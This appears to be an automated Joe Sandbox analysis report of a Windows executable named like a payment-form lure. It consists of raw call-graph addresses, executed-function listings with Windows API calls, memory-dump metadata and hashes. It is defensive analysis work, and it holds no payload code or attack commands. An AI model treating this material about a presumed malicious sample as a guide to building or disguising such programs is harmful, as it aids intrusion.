7ff6e82e1c09 CoUninitialize 15904->15905 15905->15903 15906 7ff6e8251cb0 15908 7ff6e8251ce0 15906->15908 15907 7ff6e8251d78 15908->15907 15911 7ff6e826899b 15908->15911 15927 7ff6e8268939 15908->15927 15913 7ff6e82689bc 15911->15913 15912 7ff6e8268a25 15916 7ff6e8293070 14 API calls 15912->15916 15913->15912 15914 7ff6e82689fe GetTickCount64 15913->15914 15921 7ff6e8268aa7 15913->15921 15914->15912 15917 7ff6e8268a12 15914->15917 15915 7ff6e826ed80 3 API calls 15918 7ff6e8268ae3 15915->15918 15924 7ff6e8268a49 15916->15924 15917->15921 15919 7ff6e8268970 15918->15919 15920 7ff6e82688fa 15918->15920 15922 7ff6e8268b09 15918->15922 15923 7ff6e8293140 WaitForSingleObject 15919->15923 15920->15907 15921->15915 15921->15919 15922->15920 15931 7ff6e826b470 15922->15931 15923->15919 15924->15919 15924->15921 15925 7ff6e8268a83 GetTickCount64 15924->15925 15925->15917 15925->15921 15928 7ff6e826893d 15927->15928 15930 7ff6e82688fa 15927->15930 15929 7ff6e826b470 3 API calls 15928->15929 15928->15930 15929->15930 15930->15907 15932 7ff6e826b4a2 15931->15932 15936 7ff6e826b513 15931->15936 15933 7ff6e826b4e6 SwitchToThread 15932->15933 15934 7ff6e8262990 SleepEx 15932->15934 15932->15936 15933->15932 15934->15932 15935 7ff6e826b5f5 15935->15920 15936->15935 15937 7ff6e826b5f0 DebugBreak 15936->15937 15937->15935 15938 7ff6e826e9fa 15939 7ff6e826ea09 15938->15939 15941 7ff6e826ea67 15939->15941 15942 7ff6e8287820 15939->15942 15943 7ff6e8287960 15942->15943 15951 7ff6e8287860 15942->15951 15944 7ff6e82b0c30 8 API calls 15943->15944 15945 7ff6e82879cd 15944->15945 15945->15941 15946 7ff6e82878ce EnterCriticalSection 15946->15951 15947 7ff6e828790f LeaveCriticalSection 15949 7ff6e82629e0 3 API calls 15947->15949 15948 7ff6e8287a0b LeaveCriticalSection 15948->15943 15948->15951 15949->15951 15950 7ff6e82879ea EnterCriticalSection 15950->15948 15951->15943 15951->15946 15951->15947 15951->15948 15951->15950 15953 7ff6e8287a4e EnterCriticalSection LeaveCriticalSection 15951->15953 15954 7ff6e8262a70 VirtualFree 15951->15954 15953->15951 15954->15951 15955 7ff6e8302600 15956 7ff6e8253200 16 API calls 15955->15956 15957 7ff6e8302620 15956->15957 15968 7ff6e8253a10 15957->15968 15961 7ff6e8302646 15980 7ff6e8254390 15961->15980 15963 7ff6e8302658 15964 7ff6e8302679 15963->15964 15987 7ff6e8302950 15963->15987 15991 7ff6e82f4b90 15964->15991 15967 7ff6e8302686 15969 7ff6e82b0c50 _swprintf_c_l 3 API calls 15968->15969 15970 7ff6e8253a2a 15969->15970 15971 7ff6e83027a0 15970->15971 15976 7ff6e83027dc 15971->15976 15974 7ff6e83028b7 15975 7ff6e8254390 26 API calls 15974->15975 15978 7ff6e83028c6 15975->15978 15976->15974 15976->15978 15999 7ff6e82539a0 15976->15999 15979 7ff6e83028d3 15978->15979 16004 7ff6e83038c0 15978->16004 15979->15961 15981 7ff6e8254399 15980->15981 15982 7ff6e82543de 15981->15982 15983 7ff6e82547e0 26 API calls 15981->15983 15982->15963 15984 7ff6e82f58d0 15983->15984 15985 7ff6e82f5a60 26 API calls 15984->15985 15986 7ff6e82f5993 15985->15986 15988 7ff6e8302978 15987->15988 15990 7ff6e83029a8 15988->15990 16012 7ff6e8302b60 15988->16012 15990->15963 15993 7ff6e82f4b9a 15991->15993 15992 7ff6e82f4b9f 15992->15967 15993->15992 15994 7ff6e82547e0 26 API calls 15993->15994 15996 7ff6e82f4bc4 15994->15996 15995 7ff6e82f4bdf 15995->15967 15996->15995 15997 7ff6e82547e0 26 API calls 15996->15997 15998 7ff6e82f4c04 15997->15998 16008 7ff6e825ecb0 15999->16008 16002 7ff6e82b0c50 _swprintf_c_l 3 API calls 16003 7ff6e82539ca 16002->16003 16003->15976 16005 7ff6e83038d1 16004->16005 16006 7ff6e82547e0 26 API calls 16005->16006 16007 7ff6e83038e4 16006->16007 16009 7ff6e825ecdc 16008->16009 16011 7ff6e82539af 16008->16011 16010 7ff6e82b0c50 _swprintf_c_l 3 API calls 16009->16010 16009->16011 16010->16011 16011->16002 16013 7ff6e8254390 26 API calls 16012->16013 16016 7ff6e8302ba6 16013->16016 16014 7ff6e8302caf 16014->15990 16016->16014 16017 7ff6e8251f50 16016->16017 16018 7ff6e8251f96 16017->16018 16021 7ff6e8251cb0 16018->16021 16020 7ff6e8251fa6 16020->16016 16023 7ff6e8251ce0 16021->16023 16022 7ff6e8251d78 16022->16020 16023->16022 16024 7ff6e826899b 18 API calls 16023->16024 16025 7ff6e8268939 3 API calls 16023->16025 16024->16022 16025->16022 16026 7ff6e8300100 16027 7ff6e8300115 16026->16027 16028 7ff6e8254390 26 API calls 16027->16028 16029 7ff6e830012b 16028->16029 16032 7ff6e82fd260 16029->16032 16033 7ff6e82fd28d 16032->16033 16036 7ff6e83432d0 16033->16036 16035 7ff6e82fd2b3 16037 7ff6e83432ff 16036->16037 16038 7ff6e83433b3 16037->16038 16041 7ff6e83433c4 16037->16041 16042 7ff6e8343700 16037->16042 16053 7ff6e8343620 16038->16053 16041->16035 16049 7ff6e834372a 16042->16049 16043 7ff6e8343805 16046 7ff6e8254390 26 API calls 16043->16046 16045 7ff6e83437f9 16045->16043 16050 7ff6e8343800 16045->16050 16047 7ff6e834381f 16046->16047 16048 7ff6e8254390 26 API calls 16047->16048 16052 7ff6e8343831 16048->16052 16049->16043 16049->16052 16057 7ff6e82f4480 16049->16057 16051 7ff6e82547e0 26 API calls 16050->16051 16051->16052 16052->16038 16054 7ff6e8343660 16053->16054 16056 7ff6e834368a 16053->16056 16062 7ff6e834a030 16054->16062 16056->16041 16058 7ff6e82f4509 16057->16058 16059 7ff6e82f448c 16057->16059 16058->16057 16060 7ff6e82547e0 26 API calls 16058->16060 16061 7ff6e82f4549 16058->16061 16059->16045 16060->16058 16061->16045 16063 7ff6e82f4b90 26 API calls 16062->16063 16064 7ff6e834a04f 16063->16064 16064->16056 16065 7ff6e8283480 16066 7ff6e82834bd 16065->16066 16068 7ff6e82834e7 16065->16068 16067 7ff6e8262140 10 API calls 16066->16067 16067->16068 16069 7ff6e8257d00 16099 7ff6e825ccc0 FlsAlloc 16069->16099 16071 7ff6e8257e96 16072 7ff6e8257d0f 16072->16071 16112 7ff6e825ca50 GetModuleHandleExW 16072->16112 16074 7ff6e8257d38 16113 7ff6e82552e0 16074->16113 16076 7ff6e8257d40 16076->16071 16121 7ff6e825dbe0 16076->16121 16080 7ff6e8257d76 16080->16071 16081 7ff6e8257d99 RtlAddVectoredExceptionHandler 16080->16081 16082 7ff6e8257dac 16081->16082 16083 7ff6e8257db2 16081->16083 16085 7ff6e8257de7 16082->16085 16086 7ff6e825df30 8 API calls 16082->16086 16084 7ff6e825df30 8 API calls 16083->16084 16084->16082 16087 7ff6e8257e3e 16085->16087 16130 7ff6e825e6d0 16085->16130 16086->16085 16138 7ff6e8251df0 16087->16138 16090 7ff6e8257e43 16090->16071 16147 7ff6e8261c50 16090->16147 16093 7ff6e8257e88 16153 7ff6e8261000 16093->16153 16094 7ff6e8257e6f 16095 7ff6e825ce20 2 API calls 16094->16095 16097 7ff6e8257e7b RaiseFailFastException 16095->16097 16097->16093 16100 7ff6e825ce0e 16099->16100 16101 7ff6e825cce0 16099->16101 16100->16072 16157 7ff6e8263ac0 16101->16157 16106 7ff6e825df30 8 API calls 16107 7ff6e825cd12 16106->16107 16108 7ff6e825cd3d GetCurrentProcess GetProcessAffinityMask 16107->16108 16110 7ff6e825cd34 16107->16110 16111 7ff6e825cda8 16107->16111 16108->16110 16109 7ff6e825cd84 QueryInformationJobObject 16109->16111 16110->16109 16111->16072 16112->16074 16114 7ff6e82b0c50 _swprintf_c_l 3 API calls 16113->16114 16115 7ff6e82552f5 16114->16115 16117 7ff6e8255334 16115->16117 16316 7ff6e8260cc0 16115->16316 16117->16076 16118 7ff6e8255302 16118->16117 16319 7ff6e8260ca0 16118->16319 16122 7ff6e8260ca0 InitializeCriticalSectionEx 16121->16122 16123 7ff6e8257d66 16122->16123 16123->16071 16124 7ff6e82536d0 16123->16124 16125 7ff6e82b0c50 _swprintf_c_l 3 API calls 16124->16125 16126 7ff6e82536ee 16125->16126 16127 7ff6e825378a 16126->16127 16321 7ff6e82576b0 16126->16321 16127->16080 16129 7ff6e8253720 16129->16080 16131 7ff6e825e6fb 16130->16131 16137 7ff6e825e7a6 16130->16137 16132 7ff6e82b0c50 _swprintf_c_l 3 API calls 16131->16132 16133 7ff6e825e71a 16132->16133 16134 7ff6e8260ca0 InitializeCriticalSectionEx 16133->16134 16135 7ff6e825e745 16134->16135 16136 7ff6e825e78e GetSystemTimeAsFileTime 16135->16136 16136->16137 16137->16087 16139 7ff6e8251e3c 16138->16139 16142 7ff6e8251e36 16138->16142 16140 7ff6e825df30 8 API calls 16139->16140 16140->16142 16141 7ff6e8251eb3 16141->16090 16142->16141 16326 7ff6e82540f0 16142->16326 16144 7ff6e8251e98 16144->16141 16333 7ff6e825f700 16144->16333 16145 7ff6e8251ea8 16145->16090 16148 7ff6e8261c99 16147->16148 16152 7ff6e8257e5b 16147->16152 16149 7ff6e8261cef GetEnabledXStateFeatures 16148->16149 16148->16152 16150 7ff6e8261d00 16149->16150 16149->16152 16151 7ff6e8261d46 GetEnabledXStateFeatures 16150->16151 16150->16152 16151->16152 16152->16093 16152->16094 16154 7ff6e826101a _swprintf_c_l 16153->16154 16360 7ff6e825ca50 GetModuleHandleExW 16154->16360 16156 7ff6e8257e8d 16305 7ff6e825d6d0 16157->16305 16159 7ff6e8263ade 16160 7ff6e825d6d0 8 API calls 16159->16160 16161 7ff6e8263b0b 16160->16161 16162 7ff6e825d6d0 8 API calls 16161->16162 16163 7ff6e8263b33 16162->16163 16164 7ff6e825d6d0 8 API calls 16163->16164 16165 7ff6e8263b5b 16164->16165 16166 7ff6e825d6d0 8 API calls 16165->16166 16167 7ff6e8263b88 16166->16167 16168 7ff6e825d6d0 8 API calls 16167->16168 16169 7ff6e8263bb0 16168->16169 16170 7ff6e825d6d0 8 API calls 16169->16170 16171 7ff6e8263bdd 16170->16171 16172 7ff6e825d6d0 8 API calls 16171->16172 16173 7ff6e8263c05 16172->16173 16174 7ff6e825d6d0 8 API calls 16173->16174 16175 7ff6e8263c2d 16174->16175 16176 7ff6e825d6d0 8 API calls 16175->16176 16177 7ff6e8263c55 16176->16177 16178 7ff6e825d6d0 8 API calls 16177->16178 16179 7ff6e8263c82 16178->16179 16180 7ff6e825d6d0 8 API calls 16179->16180 16181 7ff6e8263caf 16180->16181 16182 7ff6e825d7a0 18 API calls 16181->16182 16183 7ff6e8263cd7 16182->16183 16184 7ff6e825d7a0 18 API calls 16183->16184 16185 7ff6e8263d00 16184->16185 16186 7ff6e825d7a0 18 API calls 16185->16186 16187 7ff6e8263d2e 16186->16187 16188 7ff6e825d7a0 18 API calls 16187->16188 16189 7ff6e8263d57 16188->16189 16190 7ff6e825d7a0 18 API calls 16189->16190 16191 7ff6e8263d80 16190->16191 16192 7ff6e825d7a0 18 API calls 16191->16192 16193 7ff6e8263dae 16192->16193 16194 7ff6e825d7a0 18 API calls 16193->16194 16195 7ff6e8263ddc 16194->16195 16196 7ff6e825d7a0 18 API calls 16195->16196 16197 7ff6e8263e05 16196->16197 16198 7ff6e825d7a0 18 API calls 16197->16198 16199 7ff6e8263e2e 16198->16199 16200 7ff6e825d7a0 18 API calls 16199->16200 16201 7ff6e8263e57 16200->16201 16202 7ff6e825d7a0 18 API calls 16201->16202 16203 7ff6e8263e80 16202->16203 16204 7ff6e825d7a0 18 API calls 16203->16204 16205 7ff6e8263ea9 16204->16205 16206 7ff6e825d7a0 18 API calls 16205->16206 16207 7ff6e8263ed2 16206->16207 16208 7ff6e825d7a0 18 API calls 16207->16208 16209 7ff6e8263f00 16208->16209 16210 7ff6e825d7a0 18 API calls 16209->16210 16211 7ff6e8263f2e 16210->16211 16212 7ff6e825d7a0 18 API calls 16211->16212 16213 7ff6e8263f57 16212->16213 16214 7ff6e825d7a0 18 API calls 16213->16214 16215 7ff6e8263f80 16214->16215 16216 7ff6e825d7a0 18 API calls 16215->16216 16217 7ff6e8263fa9 16216->16217 16218 7ff6e825d7a0 18 API calls 16217->16218 16219 7ff6e8263fd2 16218->16219 16220 7ff6e825d7a0 18 API calls 16219->16220 16221 7ff6e8264000 16220->16221 16222 7ff6e825d7a0 18 API calls 16221->16222 16223 7ff6e826402e 16222->16223 16224 7ff6e825d7a0 18 API calls 16223->16224 16225 7ff6e8264057 16224->16225 16226 7ff6e825d7a0 18 API calls 16225->16226 16227 7ff6e8264080 16226->16227 16228 7ff6e825d7a0 18 API calls 16227->16228 16229 7ff6e82640a9 16228->16229 16230 7ff6e825d7a0 18 API calls 16229->16230 16231 7ff6e82640d2 16230->16231 16232 7ff6e825d7a0 18 API calls 16231->16232 16233 7ff6e82640fb 16232->16233 16234 7ff6e825d7a0 18 API calls 16233->16234 16235 7ff6e8264124 16234->16235 16236 7ff6e825d7a0 18 API calls 16235->16236 16237 7ff6e826414d 16236->16237 16238 7ff6e825d7a0 18 API calls 16237->16238 16239 7ff6e8264176 16238->16239 16240 7ff6e825d7a0 18 API calls 16239->16240 16241 7ff6e826419f 16240->16241 16242 7ff6e825d7a0 18 API calls 16241->16242 16243 7ff6e82641c8 16242->16243 16244 7ff6e825d7a0 18 API calls 16243->16244 16245 7ff6e82641f1 16244->16245 16246 7ff6e825d7a0 18 API calls 16245->16246 16247 7ff6e826421a 16246->16247 16248 7ff6e825d7a0 18 API calls 16247->16248 16249 7ff6e8264243 16248->16249 16250 7ff6e825d7a0 18 API calls 16249->16250 16251 7ff6e826426c 16250->16251 16252 7ff6e825d7a0 18 API calls 16251->16252 16253 7ff6e8264295 16252->16253 16254 7ff6e825d7a0 18 API calls 16253->16254 16255 7ff6e82642be 16254->16255 16256 7ff6e825d7a0 18 API calls 16255->16256 16257 7ff6e82642e7 16256->16257 16258 7ff6e825d7a0 18 API calls 16257->16258 16259 7ff6e8264310 16258->16259 16260 7ff6e825d7a0 18 API calls 16259->16260 16261 7ff6e8264339 16260->16261 16262 7ff6e825d7a0 18 API calls 16261->16262 16263 7ff6e8264362 16262->16263 16264 7ff6e825d7a0 18 API calls 16263->16264 16265 7ff6e826438b 16264->16265 16266 7ff6e825d7a0 18 API calls 16265->16266 16267 7ff6e82643b4 16266->16267 16268 7ff6e825d7a0 18 API calls 16267->16268 16269 7ff6e82643dd 16268->16269 16270 7ff6e825d7a0 18 API calls 16269->16270 16271 7ff6e826440b 16270->16271 16272 7ff6e825d7a0 18 API calls 16271->16272 16273 7ff6e8264439 16272->16273 16274 7ff6e825d7a0 18 API calls 16273->16274 16275 7ff6e8264467 16274->16275 16276 7ff6e825d7a0 18 API calls 16275->16276 16277 7ff6e8264495 16276->16277 16278 7ff6e825d7a0 18 API calls 16277->16278 16279 7ff6e82644c3 16278->16279 16280 7ff6e825d7a0 18 API calls 16279->16280 16281 7ff6e82644f1 16280->16281 16282 7ff6e825d7a0 18 API calls 16281->16282 16283 7ff6e826451a 16282->16283 16284 7ff6e825d7a0 18 API calls 16283->16284 16285 7ff6e8264548 16284->16285 16286 7ff6e825d7a0 18 API calls 16285->16286 16287 7ff6e8264571 16286->16287 16288 7ff6e825d7a0 18 API calls 16287->16288 16289 7ff6e826459a 16288->16289 16290 7ff6e825d7a0 18 API calls 16289->16290 16291 7ff6e82645c8 16290->16291 16292 7ff6e825d7a0 18 API calls 16291->16292 16293 7ff6e825cce5 16292->16293 16294 7ff6e8262760 GetSystemInfo 16293->16294 16295 7ff6e82627a4 16294->16295 16296 7ff6e82627a8 GetNumaHighestNodeNumber 16295->16296 16297 7ff6e82627ce GetCurrentProcess GetProcessGroupAffinity 16295->16297 16296->16297 16298 7ff6e82627b7 16296->16298 16299 7ff6e82627f9 GetLastError 16297->16299 16300 7ff6e8262804 16297->16300 16298->16297 16299->16300 16302 7ff6e8262826 16300->16302 16310 7ff6e8262540 GetLogicalProcessorInformationEx 16300->16310 16303 7ff6e8262890 GetCurrentProcess GetProcessAffinityMask 16302->16303 16304 7ff6e825ccea 16302->16304 16303->16304 16304->16100 16304->16106 16306 7ff6e825d6f4 16305->16306 16307 7ff6e825d6f8 16306->16307 16308 7ff6e825df30 8 API calls 16306->16308 16307->16159 16309 7ff6e825d724 16308->16309 16309->16159 16311 7ff6e826272c 16310->16311 16312 7ff6e8262572 GetLastError 16310->16312 16311->16302 16312->16311 16313 7ff6e8262581 16312->16313 16313->16311 16314 7ff6e826259d GetLogicalProcessorInformationEx 16313->16314 16315 7ff6e82625c0 16314->16315 16315->16302 16317 7ff6e8260ca0 InitializeCriticalSectionEx 16316->16317 16318 7ff6e8260cfe 16317->16318 16318->16118 16320 7ff6e82b08c3 InitializeCriticalSectionEx 16319->16320 16322 7ff6e82b0c50 _swprintf_c_l 3 API calls 16321->16322 16323 7ff6e82576ce 16322->16323 16324 7ff6e8260ca0 InitializeCriticalSectionEx 16323->16324 16325 7ff6e8257700 16323->16325 16324->16325 16325->16129 16327 7ff6e8254102 16326->16327 16328 7ff6e825413d 16327->16328 16340 7ff6e8260b30 CreateEventW 16327->16340 16328->16144 16330 7ff6e8254114 16330->16328 16341 7ff6e825cf20 CreateThread 16330->16341 16332 7ff6e8254133 16332->16144 16334 7ff6e825f717 16333->16334 16335 7ff6e825f71f 16334->16335 16336 7ff6e82b0c50 _swprintf_c_l 3 API calls 16334->16336 16335->16145 16338 7ff6e825f751 16336->16338 16339 7ff6e825f7e5 16338->16339 16344 7ff6e82653b0 16338->16344 16339->16145 16340->16330 16342 7ff6e825cf55 SetThreadPriority ResumeThread FindCloseChangeNotification 16341->16342 16343 7ff6e825cf4f 16341->16343 16342->16332 16343->16332 16345 7ff6e82653e3 _swprintf_c_l 16344->16345 16349 7ff6e8265409 _swprintf_c_l 16345->16349 16350 7ff6e82664f0 16345->16350 16347 7ff6e8265400 16348 7ff6e8260ca0 InitializeCriticalSectionEx 16347->16348 16347->16349 16348->16349 16349->16338 16349->16349 16351 7ff6e8262ab0 3 API calls 16350->16351 16352 7ff6e8266512 16351->16352 16353 7ff6e826651a 16352->16353 16354 7ff6e82629e0 3 API calls 16352->16354 16353->16347 16355 7ff6e8266538 16354->16355 16358 7ff6e8266543 _swprintf_c_l 16355->16358 16359 7ff6e8262a90 VirtualFree 16355->16359 16357 7ff6e826665e 16357->16347 16358->16347 16359->16357 16360->16156 16361 7ff6e826c75f 16362 7ff6e826c764 16361->16362 16363 7ff6e8291540 4 API calls 16362->16363 16364 7ff6e826c86d 16363->16364 16365 7ff6e826c898 16364->16365 16366 7ff6e8284530 2 API calls 16364->16366 16367 7ff6e8273ff0 6 API calls 16365->16367 16366->16365 16368 7ff6e826c902 16367->16368 16369 7ff6e8260d20 16370 7ff6e8260d3e 16369->16370 16371 7ff6e8260de1 16370->16371 16377 7ff6e825cf90 VirtualAlloc 16370->16377

                            Executed Functions

                            Function 00007FF6E8262760 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E826276F
                            • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627AD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627D9
                            • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627EA
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E82627F9
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E825CCEA), ref: 00007FF6E8262890
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E82628A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                            • String ID:
                            • API String ID: 580471860-0
                            • Opcode ID: 4e2cce3fcde6afbf2e26333a9f233b0a1031100ac6ea6b6a841eac30e88da66a
                            • Instruction ID: fc092e238cee2e319505bd2ce591df6422ebff12ecf18519c4629371e31fa07a
                            • Opcode Fuzzy Hash: 4e2cce3fcde6afbf2e26333a9f233b0a1031100ac6ea6b6a841eac30e88da66a
                            • Instruction Fuzzy Hash: E2515973A2C74A8BEA51CF35A9003A863A1FB94B80F884071D94DD7364DF2EE548D75E
                            Function 00007FF6E8257D00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00007FF6E825CCC0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E8257D0F,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CCCB
                              • Part of subcall function 00007FF6E825CCC0: QueryInformationJobObject.KERNEL32 ref: 00007FF6E825CD9E
                              • Part of subcall function 00007FF6E825CA50: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF6E8257D38,?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E825CA61
                            • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF6E8257D99
                            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF6E8251C00), ref: 00007FF6E8257E83
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                            • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                            • API String ID: 2052584837-2841289747
                            • Opcode ID: 6dcd47bc64c54c688195ce006d8b6216d66789526cdab3b23211efa9f49683d5
                            • Instruction ID: 09f8f13ea13b610793348e1155bb5995a38f4d7c929f7797189a66f637d41d2d
                            • Opcode Fuzzy Hash: 6dcd47bc64c54c688195ce006d8b6216d66789526cdab3b23211efa9f49683d5
                            • Instruction Fuzzy Hash: 5D419C23E997428EEA01AB7096017B86391BF51784F480031ED4D8769EDF2EF905C38F
                            Function 00007FF6E82B1554 Relevance: 3.2, APIs: 2, Instructions: 199COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 260 7ff6e82b1554-7ff6e82b155d 261 7ff6e82b156e-7ff6e82b1576 malloc 260->261 262 7ff6e82b155f-7ff6e82b1569 call 7ff6e82b4db1 261->262 263 7ff6e82b1578-7ff6e82b157d 261->263 266 7ff6e82b157e-7ff6e82b1582 262->266 267 7ff6e82b156b 262->267 268 7ff6e82b1584-7ff6e82b1589 call 7ff6e82b19b4 266->268 269 7ff6e82b158a-7ff6e82b15e9 call 7ff6e82b19d4 266->269 267->261 268->269 274 7ff6e82b1646 269->274 275 7ff6e82b15eb-7ff6e82b1608 269->275 278 7ff6e82b164d-7ff6e82b165d 274->278 276 7ff6e82b1632-7ff6e82b1644 275->276 277 7ff6e82b160a-7ff6e82b160f 275->277 276->278 277->276 279 7ff6e82b1611-7ff6e82b1616 277->279 280 7ff6e82b165f-7ff6e82b167c 278->280 281 7ff6e82b16c4-7ff6e82b16f3 278->281 279->276 284 7ff6e82b1618-7ff6e82b1620 279->284 285 7ff6e82b167e-7ff6e82b1682 280->285 286 7ff6e82b1689-7ff6e82b168c 280->286 282 7ff6e82b1710-7ff6e82b1714 281->282 283 7ff6e82b16f5-7ff6e82b170a 281->283 289 7ff6e82b1845-7ff6e82b1859 282->289 290 7ff6e82b171a-7ff6e82b172e 282->290 283->282 284->274 291 7ff6e82b1622-7ff6e82b1630 284->291 285->286 287 7ff6e82b168e-7ff6e82b16a4 286->287 288 7ff6e82b16a7-7ff6e82b16af 286->288 287->288 288->281 292 7ff6e82b16b1-7ff6e82b16c1 288->292 293 7ff6e82b1734-7ff6e82b173c 290->293 294 7ff6e82b182a-7ff6e82b182f 290->294 291->274 291->276 292->281 293->294 296 7ff6e82b1742-7ff6e82b1761 293->296 294->289 295 7ff6e82b1831-7ff6e82b183a 294->295 295->289 297 7ff6e82b183c 295->297 298 7ff6e82b17c0 296->298 299 7ff6e82b1763-7ff6e82b1793 296->299 297->289 301 7ff6e82b17c7-7ff6e82b17cb 298->301 300 7ff6e82b1795-7ff6e82b179d 299->300 299->301 300->298 302 7ff6e82b179f-7ff6e82b17be 300->302 303 7ff6e82b17d9-7ff6e82b17de 301->303 304 7ff6e82b17cd-7ff6e82b17d2 301->304 302->301 303->294 305 7ff6e82b17e0-7ff6e82b17e8 303->305 304->303 305->294 306 7ff6e82b17ea-7ff6e82b181d 305->306 306->294 307 7ff6e82b181f-7ff6e82b1823 306->307 307->294
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6E82B0C59,?,?,?,?,00007FF6E825E371,?,?,?,00007FF6E825E8F4,00000000,00000020,?), ref: 00007FF6E82B156E
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E82B1584
                              • Part of subcall function 00007FF6E82B19B4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6E82B19BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1331895882.00007FF6E8251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E8250000, based on PE: true
                            • Associated: 00000000.00000002.1331871186.00007FF6E8250000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332053620.00007FF6E83A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8419000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E841F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332144292.00007FF6E8424000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff6e8250000_Payment Form+Inquiry LIST.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 205171174-0
                            • Opcode ID: c2fe932289e9420f36de46b9144fd52e3974bbea9026eb45ed96a2d6b2463895
                            • Instruction ID: d23d2778b67dc23b6a4093d3abbd166d9f38955547450217d0be813cd37c4504
                            • Opcode Fuzzy Hash: c2fe932289e9420f36de46b9144fd52e3974bbea9026eb45ed96a2d6b2463895
                            • Instruction Fuzzy Hash: 6781BC73E0960289F715CF39A9413683AE0EB043A4F444739D92DC76E8DE3EA459978E
                            Function 00007FF6E8283480 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
